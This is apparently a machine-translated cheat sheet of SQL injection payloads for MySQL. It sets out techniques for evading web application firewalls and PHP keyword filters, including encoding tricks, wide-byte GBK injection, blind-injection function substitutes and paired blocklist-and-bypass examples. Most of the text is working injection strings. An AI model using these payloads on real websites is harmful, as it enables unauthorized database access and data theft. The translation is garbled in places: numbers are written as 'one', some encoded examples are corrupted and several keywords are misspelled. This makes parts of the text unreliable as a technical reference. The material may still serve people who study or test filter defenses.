one. Note symbol bypass
-- Note Content # Note Content /*Note Content */ ;
2. Case bypass
It is often used when the regular of waf is not case sensitive. Generally, the topic is designed deliberately.
UniOn SeleCt
3. Inline annotation bypass
Inline annotation is to put some unique statements only on MYSQL in // In this way, these statements will not be executed in other databases, but will be executed in MYSQL.
select * from cms_users where userid=one union /*!select*/ one,2,3;
4. Double write bypass
In some simple WAFS, the keyword select is replaced with empty only by the replace() function. In this case, the double write keyword can be used to bypass. For example, select becomes seleselect, and after waf processing, it becomes select, which meets the requirements of bypassing.
5. Code bypass
For example, URLEncode, ASCII, hex and Unicode codes bypass:
Full url encoding of keywords twice:
one+and+one=2 one+%25%36%3 one%25%36%65%25%36%34+one=2
ascii encoding bypass
Test Equivalent to CHAR(one 0 one)+CHAR(97)+CHAR(one one 5)+CHAR(one one 6)
Hex bypass:
select * from users where username = test one; select * from users where username = 0x746573743 one;
Bypass of some symbols by unicode encoding:
Single quotation mark=> %u0037 %u02b9 Space=> %u0020 %uff00 Left parenthesis=> %u0028 %uff08 Right parenthesis=> %u0029 %uff09
6. < > greater than less than sign bypass
In sql blind note, the size is usually used to judge the size of ascii code value to achieve the blasting effect.
Greater (N one, N2, N3...): returns the maximum value in N or least(n one,n2,n3...): returns the minimum value in n
select * from cms_users where userid=one and greatest(ascii(substr(database(),one,one)),one)=99;
strcmp(str one,str2):
If all strings are the same, STRCMP() is returned. If the first parameter is less than the second according to the current classification order, it returns - 1. Otherwise, it returns 1
select * from cms_users where userid=1 and strcmp(ascii(substr(database(),0,1)),99);
in keyword
select * from cms_users where userid=1 and substr(database(),1,1) in ('c');
Between a and b: between a and b (excluding b)
select * from cms_users where userid=1 and substr(database(),1,1) between 'a' and 'd';
7. Space bypass
Generally, there are several methods to bypass space filtering to replace spaces
/**/ () enter(url In coding%0a) `(tap Button above key) tap Two spaces
8. Bypass or and xor not
or = || and = && xor = | perhaps ^ # XOR, e.g. Select * from cms_users where userid=1^sleep(5); not = !
9. Peer = bypass
like without wildcard has the same effect as =, so it can be used to bypass.
like with wildcard normally:
Select * from cms_users where username like "ad%";
like without wildcard can be used to replace =:
Select * from cms_users where username like "admin";
REGEXP: REGEXP operator is used in MySQL for regular expression matching
Select * from cms_users where username REGEXP "admin";
Use the size in sign to bypass
Select * from cms_users where userid>0 and userid<2;
< > equivalent to! =, So add another one in front! The result is an equal sign
Select * from cms_users where !(username <> "admin");
10. Bypass single quotation marks
Use hex
Quotes are usually used in the last where clause. For example, the following sql statement is a simple statement used to query and select all fields in the users table:
select column_name from information_schema.tables where table_name="users"
At this time, if the quotation marks are filtered, the above where clause cannot be used. If you encounter such a problem, you have to use hexadecimal to deal with this problem.
The hexadecimal string of users is 7573657273. Then the last sql statement becomes:
select column_name from information_schema.tables where table_name=0x7573657273
Wide byte
When using GBK coding in mysql, you will think that two characters are one Chinese character. Generally, there are two ideas:
(1) % df eat \ the specific method is urlencode(') =% 5c%27. We add% df before% 5c%27 to form% df%5c%27. In the GBK encoding mode, mysql will treat two bytes as a Chinese character,% df%5c is a Chinese character, and% 27 is outside as a separate' symbol:
id=-1%df%27union select 1,user(),3--+
(2) Filter out the \ in '; for example,% * *% 5c%5c%27 can be constructed, and the subsequent% 5c will be commented out by the previous% 5c.
PHP functions that generally generate wide byte injection:
1.replace(): filter '\, convert' to ', convert \ to \, and convert "to". Use idea one.
2.addslaches(): returns a string that adds a backslash (\) before a predefined character. Predefined characters: ', ", \. Use idea 1
(to prevent this vulnerability, set mysql_query to binary)
11. Bypassing commas
The following functions are commonly used in sql blind injection:
substr()
substr(string, pos, len): starting from pos, take the substring with length of len
substr(string, pos): start with pos and get to the end of string
substring()
The usage is the same as substr()
mid()
The usage is the same as substr(), but mid() is for downward compatibility with VB6 0, which is outdated. The pos of the above functions starts from 1
left() and right()
left(string, len) and right(string, len): take the substring with length len from left or right, respectively
limit
limit pos len: in the return item, len return values start from pos, and the return value of pos starts from 0
ascii() and char()
ascii(char): convert char into ascii code
char(ascii_int): Contrary to ascii(), convert ASCII code to character
The substr() and mid() methods can be solved by using the from for method
select substr(database() from 1 for 1)='c';
Use the join keyword to bypass
union select 1,2,3,4; union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D); union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
Use the like keyword for commas in functions that extract substrings, such as substr()
select ascii(mid(user(),1,1))=80 #Equivalent to select user() like 'r%'
Use offset keyword
select * from cms_users limit 0,1; # Equivalent to the following SQL statement select * from cms_users limit 1 offset 0;
12. Filter function bypass
sleep() -->benchmark()
select 12,23 and sleep(1);
Parameters can be the number of times and expressions that need to be executed. The first parameter is the number of executions, and the second is the expression executed
select 12,23 and benchmark(10000000,1);
ascii()–>hex(),bin()
After substitution, use the corresponding hexadecimal to string
group_concat()–>concat_ws()
select group_concat("str1","str2");
select concat_ws(",","str1","str2");
substr(),substring(),mid() can replace each other. The substring function also has left(),right()
user() --> @@user,datadir–>@@datadir
ord() – > ASCII (): these two functions have the same effect when dealing with English, but they are inconsistent when dealing with Chinese, etc.
Filtered if function:
if Judgment statement of function select if(substr(database(),1,1)='c',1,0); IFNULL function select ifnull(substr(database(),1,1)='c',0); case when then function select case substr(database(),1,1)='c' when 1 then 1 else 0 end;
Appendix some common filtering methods and bypass methods in PHP
Filter keywords and or
php code preg_match('/(and|or)/i',$id)
Filtered attack code 1 or 1=1 1 and 1=1
Bypass mode 1 || 1=1 1 && 1=1
Filter keywords and or union
php code preg_match('/(and|or|union)/i',$id)
Filtered attack code union select user,password from users
Bypass mode 1 && (select user from users where userid=1)='admin'
Filter keywords and or union where
php code preg_match('/(and|or|union|where)/i',$id)
Filtered attack code 1 && (select user from users where user_id = 1) = 'admin'
Bypass mode 1 && (select user from users limit 1) = 'admin'
Filter keywords and or union where
php code preg_match('/(and|or|union|where)/i',$id)
Filtered attack code 1 && (select user from users where user_id = 1) = 'admin'
Bypass mode 1 && (select user from users limit 1) = 'admin'
Filter keywords and, or, union, where, limit
php code preg_match('/(and|or|union|where|limit)/i', $id)
Filtered attack code 1 && (select user from users limit 1) = 'admin'
Bypass mode 1 && (select user from users group by user_id having user_id = 1) = 'admin'#user_ User in ID aggregation_ User with ID 1 is admin
Filter keywords and, or, union, where, limit, group by
php code preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered attack code 1 && (select user from users group by user_id having user_id = 1) = 'admin'
Bypass mode 1 && (select substr(group_concat(user_id),1,1) user from users ) = 1
Filter keywords and, or, union, where, limit, group by, select
php code preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered attack code 1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypass mode 1 && substr(user,1,1) = 'a'
Filter keywords and, or, union, where, limit, group by, select, '
php code preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered attack code 1 && (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypass mode 1 && user_id is not null 1 && substr(user,1,1) = 0x61 1 && substr(user,1,1) = unhex(61)
Filter keywords and, or, union, where, limit, group by, select, ', hex
php code preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Filtered attack code 1 && substr(user,1,1) = unhex(61)
Bypass mode 1 && substr(user,1,1) = lower(conv(11,10,16)) #Decimal 11 is converted to hexadecimal and lowercase.
Filter keywords and, or, union, where, limit, group by, select, ', hex, substr
php code preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered attack code 1 && substr(user,1,1) = lower(conv(11,10,16))/td>
Bypass mode 1 && lpad(user,7,1)
Filter keywords and, or, union, where, limit, group by, select, ', hex, substr, Space
php code preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Filtered attack code 1 && lpad(user,7,1)/td>
Bypass mode 1%0b||%0blpad(user,7,1)
Filter keywords and or union where
php code preg_match('/(and|or|union|where)/i',$id)
Filtered attack code 1 || (select user from users where user_id = 1) = 'admin'
Bypass mode 1 || (select user from users limit 1) = 'admin'